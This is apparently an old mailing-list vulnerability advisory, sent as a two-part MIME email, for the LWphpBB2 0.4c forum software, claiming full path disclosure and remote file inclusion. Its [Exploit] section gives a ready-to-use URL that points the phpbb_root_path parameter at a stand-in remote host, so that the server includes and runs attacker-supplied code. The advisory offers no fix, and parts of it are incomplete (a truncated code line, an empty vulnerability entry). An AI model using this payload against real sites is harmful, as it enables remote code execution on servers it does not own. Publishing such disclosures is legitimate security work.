------=_Part_59592_20650484.1177339131270
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

**********************************
*AuThor:Silitoad *
*emA!l:Silitoad[at]hotmail[dot]Com *
*HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>*
**********************************



[Info]

LWphpBB2
Version: 0.4c

Problem: Full path disclosure,Include file

bug: include($phpbb_root_path . 'includes/classes_cash.

[Vuls]

1.Full path disclosure:


[Exploit]

http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt
?

[Fix]

Vuls has been reported to author,No reply yet.

[Greetings]

Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,linux_m,Diabolax,leo,stoorm, ......


eof

------=_Part_59592_20650484.1177339131270
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<p>**********************************<br>*AuThor:Silitoad *<br>*emA!l:Silitoad[at]hotmail[dot]Com *<br>*HoMePaGe: <a href="http://www.arabian-fighterz.com/">http://www.Arabian-FighterZ.com</a> *<br>**********************************
<br>&nbsp; </p>
<p><br>[Info]</p>
<p>LWphpBB2<br>Version: 0.4c</p>
<p>Problem: Full path disclosure,Include file</p>
<p>bug: include($phpbb_root_path . 'includes/classes_cash.&nbsp;</p>
<p>[Vuls]</p>
<p>1.Full path disclosure:</p>
<p><br>[Exploit]</p>
<p><a href="http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt">http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt
</a>?</p>
<p>[Fix]</p>
<p>Vuls has been reported to author,No reply yet.</p>
<p>[Greetings]</p>
<p>Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,linux_m,Diabolax,leo,stoorm, ......</p>
<p><br>eof</p>

------=_Part_59592_20650484.1177339131270--